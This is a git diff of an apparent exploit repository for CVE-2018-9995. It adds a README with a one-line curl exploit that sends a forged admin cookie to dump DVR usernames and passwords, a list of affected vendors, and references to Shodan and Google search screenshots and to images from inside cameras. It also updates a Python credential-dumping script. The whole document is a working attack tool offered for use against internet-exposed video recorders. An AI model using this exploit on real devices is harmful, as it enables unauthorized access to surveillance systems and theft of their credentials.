diff --git a/README.md b/README.md index 4bbf911..29dab84 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,85 @@ -# TBK_VISION_DVR-CVE-2018-9995- -(CVE-2018-9995) +# [Tool] show DVR Credentiales + + [*] Exploit Title: "Gets DVR Credentials" + [*] CVE: CVE-2018-9995 + [*] CVSS Base Score v3: 7.3.* / 10 + [*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + [*] Date: 09/04/2018 + [*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) + +![DVR](screenshot/login.png) + +### Exploit: + +``` + $> curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" + +``` +## tested in DVR (banner/vendor ?): + Novo + CeNova + QSee + Pulnix + XVR 5 in 1 (title: "XVR Login") + Securus, - Security. Never Compromise !! - + Night OWL + DVR Login + HVR Login + MDVR Login + +# On the Wild: +![DVR_dorks_2](screenshot/cow/shodan_1.png) ![DVR_dorks_1](screenshot/cow/google_1.png) +![DVR_dorks_3](screenshot/cow/shodan_2.png) + +## Possible Banners frontend (web): +![DVR_login_1](screenshot/loginFron/login_1.png) +![DVR_login_2](screenshot/loginFron/login_2.png) +![DVR_login_3](screenshot/loginFron/login_3.png) +![DVR_login_4](screenshot/loginFron/login_4.png) +![DVR_login_5](screenshot/loginFron/login_5.png) +![DVR_login_6](screenshot/loginFron/login_6.png) +![DVR_login_7](screenshot/loginFron/login_7.png) +![DVR_login_8](screenshot/loginFron/login_9.png) +![DVR_login_9](screenshot/loginFron/login_9.png) +![DVR_login_10](screenshot/loginFron/login_10.png) + +## Indoor: +![DVR_indoor_1](screenshot/indoor/in_x.png) +![DVR_indoor_2](screenshot/indoor/in_x1.png) +![DVR_indoor_3](screenshot/indoor/in_1.png) +![DVR_indoor_4](screenshot/indoor/in_2.png) +![DVR_indoor_5](screenshot/indoor/in_3.png) +![DVR_indoor_6](screenshot/indoor/in_4.png) +![DVR_indoor_7](screenshot/indoor/in_5.png) + + +# TOOL: "show DVR Credentiales" + +## Quick start (wait !) + + usr@pwn:~$ git clone https://github.com/ezelf/************.git + usr@pwn:~$ cd ************* + +## help + + usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT] + + [+] Obtaining Exposed credentials + + optional arguments: + -h, --help show this help message and exit + -v, --version show program's version number and exit + --host HOST Host + --port PORT Port + + [+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81 + + +## pocs tool: +![DVR_poc_4](screenshot/toolOutput/poc_4.png) +![DVR_poc_3](screenshot/toolOutput/poc_3.png) +![DVR_poc_2](screenshot/toolOutput/poc_2.png) +![DVR_poc_1](screenshot/toolOutput/poc_1.png) + + + diff --git a/getDVR_Credentials.py b/getDVR_Credentials.py index a997ee4..c54ad70 100644 --- a/getDVR_Credentials.py +++ b/getDVR_Credentials.py @@ -45,6 +45,7 @@ def makeReqHeaders(xCookie): headers["Connection"] = "close" headers["Content-Type"] = "text/html" headers["Cookie"] = "uid="+xCookie + return headers try: @@ -53,8 +54,16 @@ def makeReqHeaders(xCookie): print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT exit() -dataJson = json.loads(rX.text) -totUsr = len(dataJson["list"]) #--> 10 +badJson = rX.text +try: + dataJson = json.loads(badJson) + totUsr = len(dataJson["list"]) #--> 10 +except Exception, e: + print " [+] Error: "+str(e) + print " [>] json: "+str(rX) +# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin")) + exit() + print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT @@ -78,9 +87,9 @@ def makeReqHeaders(xCookie): final_data.append(temp) - hdUsr = Colors.GREEN+"Username"+Colors.DEFAULT - hdPass = Colors.GREEN+"Password"+Colors.DEFAULT - hdRole = Colors.GREEN+"Role ID"+Colors.DEFAULT + hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT + hdPass = Colors.GREEN + "Password" + Colors.DEFAULT + hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT cabeceras = [hdUsr, hdPass, hdRole] @@ -90,4 +99,5 @@ def makeReqHeaders(xCookie): print "\n [!]: "+str(e) print " [+] "+ str(dataJson) -print "\n" \ No newline at end of file +print "\n" + diff --git a/screenshot/cow/google_1.png b/screenshot/cow/google_1.png new file mode 100644 index 0000000..c702e46 Binary files /dev/null and b/screenshot/cow/google_1.png differ diff --git a/screenshot/cow/shodan_1.png b/screenshot/cow/shodan_1.png new file mode 100644 index 0000000..c0c0f3e Binary files /dev/null and b/screenshot/cow/shodan_1.png differ diff --git a/screenshot/cow/shodan_2.png b/screenshot/cow/shodan_2.png new file mode 100644 index 0000000..604d537 Binary files /dev/null and b/screenshot/cow/shodan_2.png differ diff --git a/screenshot/indoor/in_1.png b/screenshot/indoor/in_1.png new file mode 100644 index 0000000..49cdfb5 Binary files /dev/null and b/screenshot/indoor/in_1.png differ diff --git a/screenshot/indoor/in_2.png b/screenshot/indoor/in_2.png new file mode 100644 index 0000000..a17d018 Binary files /dev/null and b/screenshot/indoor/in_2.png differ diff --git a/screenshot/indoor/in_3.png b/screenshot/indoor/in_3.png new file mode 100644 index 0000000..0f7405d Binary files /dev/null and b/screenshot/indoor/in_3.png differ diff --git a/screenshot/indoor/in_4.png b/screenshot/indoor/in_4.png new file mode 100644 index 0000000..e0a4373 Binary files /dev/null and b/screenshot/indoor/in_4.png differ diff --git a/screenshot/indoor/in_5.png b/screenshot/indoor/in_5.png new file mode 100644 index 0000000..408f1e1 Binary files /dev/null and b/screenshot/indoor/in_5.png differ diff --git a/screenshot/indoor/in_x.png b/screenshot/indoor/in_x.png new file mode 100644 index 0000000..3433901 Binary files /dev/null and b/screenshot/indoor/in_x.png differ diff --git a/screenshot/indoor/in_x1.png b/screenshot/indoor/in_x1.png new file mode 100644 index 0000000..9caf63c Binary files /dev/null and b/screenshot/indoor/in_x1.png differ diff --git a/screenshot/loginFront/login_1.png b/screenshot/loginFront/login_1.png new file mode 100644 index 0000000..8b4abd3 Binary files /dev/null and b/screenshot/loginFront/login_1.png differ diff --git a/screenshot/loginFront/login_10.png b/screenshot/loginFront/login_10.png new file mode 100644 index 0000000..cb8b64d Binary files /dev/null and b/screenshot/loginFront/login_10.png differ diff --git a/screenshot/loginFront/login_2.png b/screenshot/loginFront/login_2.png new file mode 100644 index 0000000..f1f75c6 Binary files /dev/null and b/screenshot/loginFront/login_2.png differ diff --git a/screenshot/loginFront/login_3.png b/screenshot/loginFront/login_3.png new file mode 100644 index 0000000..26e4481 Binary files /dev/null and b/screenshot/loginFront/login_3.png differ diff --git a/screenshot/loginFront/login_4.png b/screenshot/loginFront/login_4.png new file mode 100644 index 0000000..d704753 Binary files /dev/null and b/screenshot/loginFront/login_4.png differ diff --git a/screenshot/loginFront/login_5.png b/screenshot/loginFront/login_5.png new file mode 100644 index 0000000..7a0d266 Binary files /dev/null and b/screenshot/loginFront/login_5.png differ diff --git a/screenshot/loginFront/login_6.png b/screenshot/loginFront/login_6.png new file mode 100644 index 0000000..27a1448 Binary files /dev/null and b/screenshot/loginFront/login_6.png differ diff --git a/screenshot/loginFront/login_7.png b/screenshot/loginFront/login_7.png new file mode 100644 index 0000000..799277a Binary files /dev/null and b/screenshot/loginFront/login_7.png differ diff --git a/screenshot/loginFront/login_8.png b/screenshot/loginFront/login_8.png new file mode 100644 index 0000000..783f674 Binary files /dev/null and b/screenshot/loginFront/login_8.png differ diff --git a/screenshot/loginFront/login_9.png b/screenshot/loginFront/login_9.png new file mode 100644 index 0000000..45877f4 Binary files /dev/null and b/screenshot/loginFront/login_9.png differ diff --git a/screenshot/toolOutput/poc_1.png b/screenshot/toolOutput/poc_1.png new file mode 100644 index 0000000..e89e004 Binary files /dev/null and b/screenshot/toolOutput/poc_1.png differ diff --git a/screenshot/toolOutput/poc_2.png b/screenshot/toolOutput/poc_2.png new file mode 100644 index 0000000..27ca046 Binary files /dev/null and b/screenshot/toolOutput/poc_2.png differ diff --git a/screenshot/toolOutput/poc_3.png b/screenshot/toolOutput/poc_3.png new file mode 100644 index 0000000..8a34ddc Binary files /dev/null and b/screenshot/toolOutput/poc_3.png differ diff --git a/screenshot/toolOutput/poc_4.png b/screenshot/toolOutput/poc_4.png new file mode 100644 index 0000000..4050f4e Binary files /dev/null and b/screenshot/toolOutput/poc_4.png differ diff --git a/screenshot/v/tbk_vision/indoor_1.png b/screenshot/v/tbk_vision/indoor_1.png new file mode 100644 index 0000000..ec58fcd Binary files /dev/null and b/screenshot/v/tbk_vision/indoor_1.png differ diff --git a/screenshot/v/tbk_vision/login_1.png b/screenshot/v/tbk_vision/login_1.png new file mode 100644 index 0000000..7d6ac69 Binary files /dev/null and b/screenshot/v/tbk_vision/login_1.png differ